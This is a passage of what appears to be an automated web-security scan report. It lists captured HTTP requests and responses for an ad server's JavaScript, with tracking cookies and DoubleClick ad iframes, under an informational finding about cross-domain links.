rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15088%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15085%7C15085%7C15082%7C15085%7Cundefined%7C15085; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 26 Apr 2011 15:23:39 GMT
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:39 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=FfdNBPqTg5Ogeg4Gvt1sD91oc1OvAAIopJH1MfG_EhLnC_qO6MHzQQWlPjZ1W_-t77DtXuOsguLFXai3AhFvnPZsdOWLg55db-rGyslK6Hn4Gsu4bgzX3HPXF8aZ-svzaHqjEn6Y89hUb1ebcReTqO0G0mfFUdQh0TS12QC5rddTOvP6b6gjBcpH_C1SCNpqOOOSUZ6393Jg_uuC6PaOyufpl4r1zJFBSq1N8uZBwmJnJIAhkromTQp5NWh0AmJAoqPsrsARTvM4FL3_F2IyUWnSvjM6YIyaPo076xrJcUMRbqqdnKZE_Rr_uBv1fpYoqTX7HdciFKtDLlrsXGI8WeFEaqmhzc4AexOvlbEc2vBxeaHaPnRGzUGsshYknbHZ76c4pTy1x4tO_Sj_92V_c7n9dBgb-mUQwCsfFjswrIIZPRlERVaGhUKD4I6xui-k8lCKtjWb8L9cUWaU-0UIo8q2otA9JeeRhKkLEFeUQ_RMNQF2iyMUjVL7ttzR-BfUwEHA_EPrShsGu2vVdRNE585cySrnTOh9dMxUw7WE-jbzjFm2F4SROX5XJ58cmC66JFBq_2-XSn1gqAIjLZzdU6477_djhhS3SPkBUOiwXvOlmotVFErHsZ98d0kz-YJqri-pvt5MhqWaQjjpMBxrbDxPEDs1qpDsWDsRvlIeEnz5gKDVPYLbmT4OmR4NPZdtD7k9QAhA1y9lElb1FxLMTTlE9wGHxh1vi4jaKSjW24VcWuh9OwP5WPMPXscRpCIMAUwsBeLeV0CDvZM5QZ6Ftq1YsQUmG14zwsdGjNCmXvH89Ns8YMIodbd9oSQ80dokk7S5ul1zP6BLW5eswwD4eWnSvjM6YIyaPo076xrJcUOxLUO2TMPVjIrqDa0tm-KiBTwJ3Mz3nWcDL3eoMcRG7qSFM-Ia8iW6v4r--R4cQ0tOXuzZZM1HHBzHQCnHDFIT76c4pTy1x4tO_Sj_92V_c2h3ymUN4Kcfp_vUL9n2zWwMihkX8zucrcdwEbmMe-hvJRVE-2eJRtXuJuLGMKv73tIlgifHPMyMYOKyKgjFTLZMNQF2iyMUjVL7ttzR-BfUXXk1Trf8LJnbyKEXEXy4Rs5cySrnTOh9dMxUw7WE-jZwNXri7ovUdLf3Y0d2cR3Mo0lffrMYn7DG3CobkkduYq477_djhhS3SPkBUOiwXvO6Kt9mMt7SwQaRBfvCxoXpri-pvt5MhqWaQjjpMBxrbFAAi6qyCp8bWnTpeqxAQqD-Dto7E8GwAg5Pmqnod8-GD7k9QAhA1y9lElb1FxLMTYR8GJndpgqdetG7Gif1SgdcWuh9OwP5WPMPXscRpCIMi1HTwWt6KUDOBOeqTXHz5bMr71kjDg1X648oQCMr_-pcs6-yUjStQuln63OD6AXuthlJn1ar6k7JMNu1QAN0iG54DqOheKMDeziVqBn8GZyeZoSeZjxWwnMyW93qk8bfadK-MzpgjJo-jTvrGslxQ1Lf8W-KixpiMgaKLVnFYfdM2M4TlfE8-EAAJpHFMIjpod24YCXPiz88Q4FnH7hHkwC363daRWvDMQSggQ0XBJ3vpzilPLXHi079KP_3ZX9z_D3Pnxac4hOmSOizeoBAAmxcqNpbx_qyOHF8bx__m3LXXSqRzn2UVUm82kY9Q_bAWhV-NPCnkoMVp1trM0nzB0w1AXaLIxSNUvu23NH4F9Q13Du5h2ZYkpF0eVjjZLPxzlzJKudM6H10zFTDtYT6Nv7ck4hLa59nrUxBxfvK0jsTiDPqMR2OonD2-THiRk-erjvv92OGFLdI-QFQ6LBe8_DPa6OuqYk9OTYaaVjd1DGuL6m-3kyGpZpCOOkwHGtsbfcmG0fy54O8N3wai-WvMYQPGY_BRfLoJQ-fzCavlZTH05yYchy8iu18YHh3Yjeufsyc4tF_hYWieSe2zh_teVxa6H07A_lY8w9exxGkIgyJaaRHTrwpoz27fIZ1IYrP0_5bgJl8vrWh4S5IofNmvPz02zxgwih1t32hJDzR2iSFfqx4MhvTgtjM3lWSYPHVadK-MzpgjJo-jTvrGslxQ0RcVu8jaTaGeoRXAyPCre50Ap9gnzkFEVb7fs7kVfWDMqWV5CaT_WJtk2pUzRC4eg47W10Xto39Ckmzrya4h33vpzilPLXHi079KP_3ZX9zDr0_5RCzZyGIrZvmqD0qM4OT5YshiebyZ7gQJS9Y2G7nSV4NcuM8rWRbl8qnNncE-KnYHtDCpxbmzdYonZCReozEk2lFkYL78ePNoyJfDPFQx6yXCg7HucZPwYbGMGquQBLetBIomVzLxRoGxCnj9AuAQa0jxkQqiAZvgO5_1I0StRTQfNp_8TKujPl08Nio3VO03uwsDFLvsKFK97otf3P7Da31DnYEVo5TPgRz20GdnA6Cc72wg-FSafZjckluCDYSsbafBv55Fuk04mpOQ-8wTaZoi4WtPLy3Y3_RsAIb58ANfJNPw7PDUJnwvB5dd6Pj4inu1F6wbmUeqF8IzBEKDqi96IV8EJZ5BHYIe6k7CD2J70CjIpgjp325VAAQQdaIpbGH7ED3K8MO0N02HXED1_Q1nKKRzK6-Rem3ynzIZcssxMIxa11vVxs5mT5Uf91F7QAbAskQZLgankz_lEAtsWoRc15hRbwTJ6OpTIfeE9K-EkC4wSG3itwHytKKywH0jEuEtimvw01NpAdll_S12LxBxPSFr3AblTJ7QlhxOn7NpzXjHY_E5lvc4A6NuB7ghG0r9F5ryP8PbOUmNlPE47_4cVrSmIJL5HRi5olIbPfhz06rl7TrRbZu6TgoL4F9VUieGd2NNutj5j2Ykjk_oiZPJQNg7s-IVZj_8x19CUDvtIMl1s27WDYDzDWC_LSD_hITbj4n3NJ1VnSODES7HgOnosb-a6IAhKWZEUXaNYisGujMcHx0-V460jT0WaPFOl7r-G1YurokLRfo7nTkNuS-FBQ8_zqCnhKxdkov0SCCBSsA9JuQotNKJ3eme79-Yk8VnPY0NhpeTxKpkv2hrlh0-3r1iJk9NptV68epA5hgUytkmdmxxZLnHriOqlwIRUgsfIlB6JAryIf1QYW7ABDvcp7PlPgkJSWReqXTf7i8khFNnmzwH7l3uSRIJ9CaGKwVgQZWnfY1DwqN3RpkxZoDBSjtxesSm3Uug3sv9nwUirjHGXOnnQOyMp0rDIgHDbs1vRtyybpwPmOc5yMEuMrTMtlonH_O9JeRPOWP0ZIih2xqCfVz4XEoVm7IJ9GGhR58b-k1cysnOhgQ4XoPFs4VpT53jYjQ1BIgYtT_QesIMpas4UCL7cLQUCYEefF8ZhuDwI6vTYJUDfh7N4eviQPgiUdr4wy3HO5F-m_plXLm1QU_y8eE9lmQCYwznt4hvD-1jgLwfCa--WFUa_x_ig6W75jQfoKoJulCUXe_iyUTY0KihwMRsyHtwNg6X-lTVLUMvMaLLHAZy6qByVfshfmQXD3gCj1g9GfL5GWIfSL8ueQYsJ2aTgwcNjtxIY7OiRH46Py8__ZNIhhU37x5BD07goFgJXPSoi1qO3GYCyHDGFt0zB7oyV5Po_JUlyVJIDWF8ZE3Z5lVCujHjrE_-wqHnoWVM_QmHLTwkEB8etYNKKOHF_ktFST_LIiB; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:39 GMT; Path=/
Set-Cookie: fc=F2nbXY4wwxMQ2-he6VYeifaRRxFr5MeY29EQT3n5PvLWxCHnHcZ9c7H5tLCAyYGL9mvM8AxO6Wo9RZJIxm2oF2_ICtsxL0KUEYWMLSd-wG8Gn2BjtD6YgIvLsovsrQsM3UekJ-H8erl5fjZijTgySbhjzsJdH2qIqE1UGB4xWwFfA3hHwBPZ26rwLfEhGtco; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:39 GMT; Path=/
Set-Cookie: pf=8SLxkLbfsZjR0znsHi3neH4OSvybkQwzidj39osYezeS04H7stKnZdMqlx3yK2bU4q1C_4bU43_azC2tZTPOE5xKMUvxbd3f4Da9CFOTnTLWCQKR_r6qY54lFjJbA4MKo2PgnaN3rNEZPcj1JP_yFl3OnJaEawY-HzaiUFPHnzHCJURYTll9YSZFjFvcZECT7ANZN-zFyB3LaaiNSQAne-eUjAeuFexCQpSIGGE-hCu26aZc5sDc4UJmeMYA4wA4zO05pHI-TuL2Zs_aTFBxV5zGyX9gCVIJL41fXCewMtGIOTObyhw6XI9NsuIQ3LHMPwDuZeCTmjbOJ12_tYZY7qYaNMhlV9JYPNAa9WJ26feij1a04Z4aJbTbeEF7HREPS4iF2IFkJR-IDjmCPDngrg; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:39 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 15:23:38 GMT
Content-Length: 10889


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
oncept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;


document.write('\n\n\n    \n\n     \n    \n        \n        \n    \n\n\n\n\n\n\n        \n        \n        \n                \n                \n            \n                \n                <IFRAME SRC="http://ad.doubleclick.net/adi/N4515.131803.TURN/B5378843.4;sz=160x600;ord=4368933343399774953?;click=http://r.turn.com/r/tpclick/id/6Qq0bLqRoTxeyAkACAIBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBD-aSeUC0TavtIsTQlQeV8KSSA8CshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGoKXIm7CXh8BG%26num%3D1%26sig%3DAGiWqtynzGyD5NOSB5w7sFpbILgCD5Jd-g%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4515.131803.TURN/B5378843.4;abr=!ie;sz=160x600;ord=4368933343399774953?;click=http://r.turn.com/r/tpclick/id/6Qq0bLqRoTxeyAkACAIBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBD-aSeUC0TavtIsTQlQeV8KSSA8CshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGoKXIm7CXh8BG%26num%3D1%26sig%3DAGiWqtynzGyD5NOSB5w7sFpbILgCD5Jd-g%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;">\n</SCRIPT>
...[SNIP]...
GiWqtynzGyD5NOSB5w7sFpbILgCD5Jd-g%26client%3Dca-pub-6888065668292638%26adurl%3D/url/http://ad.doubleclick.net/jump/N4515.131803.TURN/B5378843.4;abr=!ie4;abr=!ie5;sz=160x600;ord=4368933343399774953?">\n<IMG SRC="http://ad.doubleclick.net/ad/N4515.131803.TURN/B5378843.4;abr=!ie4;abr=!ie5;sz=160x600;ord=4368933343399774953?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement"></A>
...[SNIP]...

23.42. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25474489&ahcid=640462&bimpd=D1wGbT704vP8WlJTzQ2cV2MLf0crBPVD2Y7dg7y_To5KfJFpWkYyPrBRLwgjCy6YuFTWCPddvgIofnAgOUOLyq9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BH3iX1ZfkEPugt72CmK04CyGDOWIWwtpfKu6Yb9nPGUMhtlfbsVT-wOwKJBNR3jwWTazV0AvbMQZNLntaOeKl1p3e0zVN6loNyK4c_OoCgom8jpD4tX7Nxwn2-BtKmkq7LmKEOeK4ZAoWfwI8SCWgb1j-Ezh3q9PALHUe6oayQIztC8cnfVoc-ffY0bjr9ypPr7vVxLo4SQGNqr6znxbeBigsLTxdpnye91zCQ7JsBxbrg3DoDCmL2ffRtSVuJNqJgaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IMmAKf-fTCPDGWd8sW3YPeuZcgF_uJfsdRlJrg2l5qBJ5nm0lTjSklndxOrj4-IjIX91mNtx9s8FQapZIbkQ1tNBrIEGL6Qi9P13I5nx5nfrUTIn0Td2nwm_BxyX48CybH3NngsQiO9YMiN-l9OgnK6Lhd38O4b4WbBWengTve4vt_T370WDWWY1SqEwEJwbhoHTLamDrAmQq2DYIVNCf6VQGYjf1QW3f3F61FH8ZW8ZA9y0FUzpqtDC0K6uSmpOa-_o7WETpsTIqibm6vBqblKo408BxR9uazB8jKSDnLvk&acp=TbRMCgAG27YK5XbJLDQXVk97sR0DVdN5sQtjdA&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBHhYPCky0Tba3G8ntlQfWrtDhAsCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAbClYHu9567sukB%26num%3D1%26sig%3DAGiWqtwpBMlqXzWHH4VX4kgZ93lH-yM4vQ%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679581&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661581392&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661581397&frm=1&adk=2614322350&ga_vid=918498602.1303661581&ga_sid=1303661581&ga_hid=284338913&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2931142961646634775; adImpCount=EWUBaJZmyFGxWjcO-eZbFOJqGs0llZejYLeSvn_8AmLDlGIUOWYS4TNj-1gj_Xcu77DtXuOsguLFXai3AhFvnPZsdOWLg55db-rGyslK6Hn4Gsu4bgzX3HPXF8aZ-svzaHqjEn6Y89hUb1ebcReTqO0G0mfFUdQh0TS12QC5rddlL_7Sd03oVhIRMo2spZSRBnWLKExEujTs2F2LvhyiERu8NfeyA_rS3BgELcsMsmBueA6joXijA3s4lagZ_Bmcz63pE4ozprgEO3FrlKYcQWnSvjM6YIyaPo076xrJcUOWfPVDM4ewql4E0qnTePubkBNn_TRBrw78HyPdexCRUXmxHZfc4p6eOVS-LVkk2KfBLeu5dFGcYKXhSdYOkpNX76c4pTy1x4tO_Sj_92V_c-Zd5gzh76DvpSEIud5bTmzBxQDH60wp7kWI6OtXwmsK8lCKtjWb8L9cUWaU-0UIo60LYKVlDBRhtDudy0aLm_tMNQF2iyMUjVL7ttzR-BfUM-tp89GxY2BjWUXIKPrRCs5cySrnTOh9dMxUw7WE-jbFzWA_8HGnuPTv5gj8D-oTVbRheWFalCX1wFIJaPC0u6477_djhhS3SPkBUOiwXvN_WwtT_ZKGSyDgXfkChQ0Mri-pvt5MhqWaQjjpMBxrbOSPaoBe4rX2OGkF6B5R5CKJoFEcgByN-Oi_xplHijt7D7k9QAhA1y9lElb1FxLMTWJMROkp2Xp7-HrCQ6npmBdcWuh9OwP5WPMPXscRpCIM-AxjFwSedJsA9duBIIoEH137K3Xedhve5L8S-WPAK15cs6-yUjStQuln63OD6AXuV4KgDOLc_1A4zE1C7F6UsGnSvjM6YIyaPo076xrJcUMGbKH33Mk3AAwHXX6IbEZeikZt4xeL6nraPEnFmjJxqM5LKwaW7Iwkg187TjopMcM05BucZOqIftlq19PLBiS676c4pTy1x4tO_Sj_92V_c98DRRkWusVt-Rux-hx66uC8mSFRnxnBUrSsMeG95GDw110qkc59lFVJvNpGPUP2wGndfgx95uzctKDelIPRbDBMNQF2iyMUjVL7ttzR-BfUd8a7ZlLpYgNqlOs9AM3Pas5cySrnTOh9dMxUw7WE-jZvFyIY8t_idDXE26ZOboPiYr1Cgt3jCTxEf1c1hGpvTa477_djhhS3SPkBUOiwXvOwqcR0Ec-KDppc0eGaONjEri-pvt5MhqWaQjjpMBxrbNZUSW4tD2VUhTWhRWU0h3yuPGM9W_Y4f-0-7YcinRzAUojhpX01rVy9-nj4jsvWlPVnIv-we7WrGXA10RMH6AFcWuh9OwP5WPMPXscRpCIMEZoZABCtvE0HnT-mxDiVVlnZKM_XJqTgUu_ZQzKn9FupDjfslrVyDxMBDlIppEJH3Wi1pcsBzL-a3IKmDdYDffz02zxgwih1t32hJDzR2iRH1xuEqF5DOIMy4KaraXc7adK-MzpgjJo-jTvrGslxQ970lXXKY1IvTeRRmXa7ij15xA_rvxJf0kdWomdIMrfwedEtnsFAncF6xSZD-ONiaGH_1ig58l32p_YrzpHC_DrvpzilPLXHi079KP_3ZX9zUcbIjjByU9n3_IlHTjKXIyf2BXQhSGVENGxgKqnojxrKV1B7NBMN8fr3nrJxtWo72xCVN_41MyrkEhrGbQ_r-Ew1AXaLIxSNUvu23NH4F9Q62Hc-eW6IaqN1LFSpkN26zlzJKudM6H10zFTDtYT6NssphFVz66kVO4sp3KHcbJzHb5BhyxmUX3VNl7WMXnrrrjvv92OGFLdI-QFQ6LBe84v3KLBrKgbQQ7FReWo9zyyuL6m-3kyGpZpCOOkwHGts7zs5zEeOZSTUu3-RSAG5SAhkRuulSpIxjTvGPkA2QGYPuT1ACEDXL2USVvUXEsxNr8F_iZZnVI2kVI3kaWBhdFxa6H07A_lY8w9exxGkIgwYLyQMK_xFsleORqJ6nP1RSUtLeguGIQ9odHomQReXE1JI7eQCKlb1D2RYtn4wmX-cOUcpPIvbDh06dGTnPu7CadK-MzpgjJo-jTvrGslxQ5uijGSE3qRQ5wNhEnVbHUsml822lIAWZilIfMj6Aa8Xj_Fvokk54_adFqvZFXeehnrUStPhVFMnK3sDBoZU3ci4v7aFu6WfkCEg9-gVQX8Q4cSdQOKBWDUzbKd_9Z6_1Q9fvn94HXXFFPok0XXz_lzz4kt5Z4ia2sPQIkWnZc70irWdCeM-u-vI54qVTRBQSgPcqV6Y2man6FmyrIe5Yq-TqvOLmhyJxn_95-Z3_1f0os_XT4LxOAvjvzeN7-AvJe56C8TwxqQRU4R3ZrbbaD-UGdqEtI70aFECTjCE5M1RilPlTvOohWo6nJDCKG3NLslXLmghzpDDtZAAuF74GHqupiYokZznsRUuLKgJVpmKZbouowwqHVMmrEyBFPkY8X3rm--dL65XS9oD2kwF5AOsl-kpku_LUHGeu_iclN40sBjLGC1FCDqtyneoecI6MynUKHBs7b4hAyHe6Wni-b8Ch9sdvJWJL-XEav0rzxUE-2j1RC7AaYS1r4k-RT8i5r_GuRLYdBH9a518-MBD8PEjzFQ42LRU1SD-fQKYyMDcSGuLeXw5pUdyBgZD1sVIQDSSCOZsH3K0mV8E8WP0S_CRR_lcJU1rNtUwiKnfAgVOe78_ul4gnPOjgSi_beFMrOprpkF5pwBlGNEZk2dX2WOvh930oayklFwpR7Nw7dO1cwklWUR5XSyyOKpTMTyprCRKAlxmSp6mJK1JKd_OCm7oSAqjPbKEz0gcyuJwtoKmEgxu7DlrQ2UqoHQKx8qawiP1skZKIo0OBajW4B2GlRJDSNqRdDAWLQM-1xGwrw1V2l9SKblp4mdcxJ2bKDsYbgES6m7lrFM1rwEMfTJ3Tymv9GS3pvYXg7-KGuUaNNiBThh13GdOafbnGZNV54Kmb9tuK34KB--Q7mmF3L4GXx4N4dwVQezgR-vakHeMm1tkOOKSDSyYXCFI9yf1czl8WRh_DOme_SUNfttfzxhntaDohVW90HAxHNIqEwyFyGA_gvD4xi98_oXYTU-s8mYSvwzBslhQDw2Mp8fgtaf1S4kJGEzaH6IFPKb67-CvuG6uPZSKaYksIZ6vgRIsANPHM91D2UEXiR3y21eEGvCvOTQ9Q2giGnAg1I8c2uKPt9I4n9t0cPjt9q3G-BrcD853O6tRjbiJQR2SzczGSWCtt5n0c6k5qX3aiaiCzXNQnsJnlRD_4g5rfldrbtSpeHNwDk8RZaOZiITED5thVE788H0waXmf7Hr901y2yaDbL4ntB_j2N7-4eLJlAyqfqI-k_-OAHCxwLgfsRJP2eNKMpujkYJ7EHLzMgCJTF1RacRFxslt9e08UN1A0iVz81AAjkFqJ0AXxl1yeFSFpBnH-BVnlEzZFC3z4KsC9DbGY_EctD0U0oab-i0SEC4oIIvWV2PB1myfIdtFAJQaOWlaGl4LwdnQT7eyeKlFNus-4kSx23TimxCVQ8iM-Wp0pJ_AEXCYkjg7o9fxh-FNxsbgCxS4azfwRhbvWa_Mty2ljxJHu2ZFaqRM41Pi6mZhoziTfwKukCwwTnlc_r9pAvmGQhY32y1_fjcfNGDE7NIZVmpyY; fc=CY2CvppwafJJyjUZFQ99qonWOzrcCAtvBLJ7rt7nxvwOroFRx2XuHPzgWXaOXUfA8cfAv-DtLHAFs8N68NHV5RPL42KIOq8AMY2hgvsKZx1FABy3gDjK2AW1VNcbZUpFSe25RXv26WI0qL0SpJdAJ7JJXeEFs9NZ0gSzTwZZgAnGiWdV9YD0LaTwzLrhA_FAtOPW-qcao33rbbVonfzjIQ; pf=SfwzbjFBGPtI_QCGleAadJ4DzXTsleaXHUea9FgkP1oD7Agbx16b1tFupm-maAdhVph2wlEyNPD-nC393G_cGzLvM3HFoT1-FCpzm-MKfklPOCe82KgqToYRhW6HgwVoE3va3tFbIulbfAHHg6qLPxJjjNne5gQCfZoPBJYUecUypyOSeO4DZgAErKDFL4nmab1lXJw1obvDRibzZgtA_NBn36q9CrYZ1jstKTxU48XLE-tbBvAEe-gRF2n5GBBa7IFPAber57QaAZWo4siYZeF2CRXcV54oIjYpDcUzsDWqiPICV6C0YYR6aUbfWiXzHGL3ac-T3uk-YbeZeq9YYxt9kntia5Gb7NvM26vC8wp7z4g-RTWN4LXyWBXSHV5861l9QQggHn8odCLM2AXLQg; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15088%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15085%7C15085%7C15082%7C15085%7Cundefined%7C15085; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 26 Apr 2011 16:13:00 GMT
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:13:00 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=xGTej_P6z-AI9EkS7kehzo64ADMMomwi2Kd-7iCHi7_faqaDzVRu9ZiuBStYaftYxEdzmswgsukEeGYUFx4XIAH2_SOXrIDHPTc0gR2ZYb6X4Qp5J-iSAILnbVuT-E5I21TccxBCE2uOguftNs3B8ws3ywwa2wQp8g03EqWK3wVAhuX1MPtZRjyxWXEoNUZouI1SJymtFf-wX5NeM7FxHXVmVcdQcncuBTFXyb0KORpEc8OVkmsGiB-c6iWVn9ldY4HvbSeLOdW26rSDu-z0b7fwESJ4HNhmJtjvBex-YKBTx2Gs4evsrSNgGeVjsyPbKIV4snhX_CzOkMjSybhlnGNgPZ2h5YBD5bTRezNIX0QPq_AuxX-WlX6hyJqKqX-YemNa-3CGw7dg2Xbxl9yyj5Cwx_9n5HvXijm2JlWJms9d0_CLzTvwT1_vWGRBlmkvxylPN4c5ASigyqNvfErAzVlV-xppIAIRU-E6Xxhd0g1qGjdQJTtjVZ9bXK_YQ_BTPIDICSW8WM7xIPHoCZ9csG1HPNJmxjyYHWoZ-RvqO1Rs1rGnUx4NiY1Ie9e-vPNW0aqWOq3NoDPeH7JXM2kAQx3BGIBe1qfIDTYPebZTLrCN01rbeHDjmF8QPmPzndMIKR1gXBTdH5jry0PtoQ1AeADdt5QfyVcVFtWyaY63ycUd8fmIByXYO4W9y75kdG0AQoWhO66D78aQTUGOa-5a4Cio7FFOm5qLlcOlN8m6qAFtBPdeqoht9ByqjYbOh33uXy0WJccNP-WrMuAFt_DN8BNfPFGOyVi1ejMa8Qj-jUBEc8OVkmsGiB-c6iWVn9ldTgC_Ak1kfCX49woOLgln4LfwESJ4HNhmJtjvBex-YKATa5P0J4l6SMPcleXSZUgKXqY2OOrhbbZiMMhusPur2COjD7OO6-cARpkZSLPRSVlz7bxQk2m7nUZTjP940VM0emNa-3CGw7dg2Xbxl9yyj5mGxcpA9K8MPaFMg7vSCd4YjVge061K_CIJwjIVI3mKEUY0gkSIQpBXzynTrJNwCU9CPQRi8ejLhsKBC1EzuyRqGjdQJTtjVZ9bXK_YQ_BT6tvEpcorqvKJSz9XUV5ADG1HPNJmxjyYHWoZ-RvqO1QZtqyYXm7J9l2WVQYgB0ZOuDurPLPnz-YOBYV3SJoqVB3BGIBe1qfIDTYPebZTLrCg213B_3KfWxyuxZwuZ_VIxLF72myMOFxBfRNILksmlRfdf042SkeHr5C6y-qnARS7ydaEWI9YJO4hL2FWVn0A9s0VFk8U9Vbb0LQSoVT9CYOcJtb1C5Njj-_FAA5AdHSft6aE3xtLefF1xo6gp8PomJSZGc715-qiikrpV_I4w8fJY6IePZZI86sLDhdyJrWco8yN0o-GE9yUKm7Izjqldne91Ojn0JeOvIuNOXHOlgIUZEyfLi_7gOz7FaE1JidJi9uyvtzWqsZ0dzmIBWpnQQ0XtSgyP9-pRtjKBA9CwzZBYDqpER8xtNz5vqcBHQJjw1q3jr96MmE73EdnErm3GtkQfIfrEeQndfPQcUU9Y3wLGOaTyD0NNQaCid_rWLSj37arSozuBgqeZjp8etrKKy4vfq5hSqdfC_dvkRpi8YKqMVJJLJFDSB1wQojnNFLtzTBZ8-sNi07K9uPKjmS8KSy5IN8fq6zThfQknsYE77aOKgIo0ch62xNrWzvaWUZq3JOrlyZTfomXyu4Bi_JhsDf_Pg2Vk_EWg-3dTD9pFW_t_N8vtWVDC3jC3vfThv-B4KgwPLGN7w3g3UlIFn3ul7s6FAXEc8n5El2XcbrTufdfD_fSbxeAqyz9mJvwFQ9V0D5pFleY0M_uVIjbBBIbeiEGIeAZyJv0xLpehx5_KSnf80bUI96fpmYoEvb9KaHgGmzu9XVcy87K21WiFWA7RvztB-_rFiFIyTKfRMvlirJgtkwbjBAoWil1i7PXIGTKPYDYLf_dPYrAYTeqFbcrk8X1saScQH9yIY0gJl3Ymni7O_xO9Fe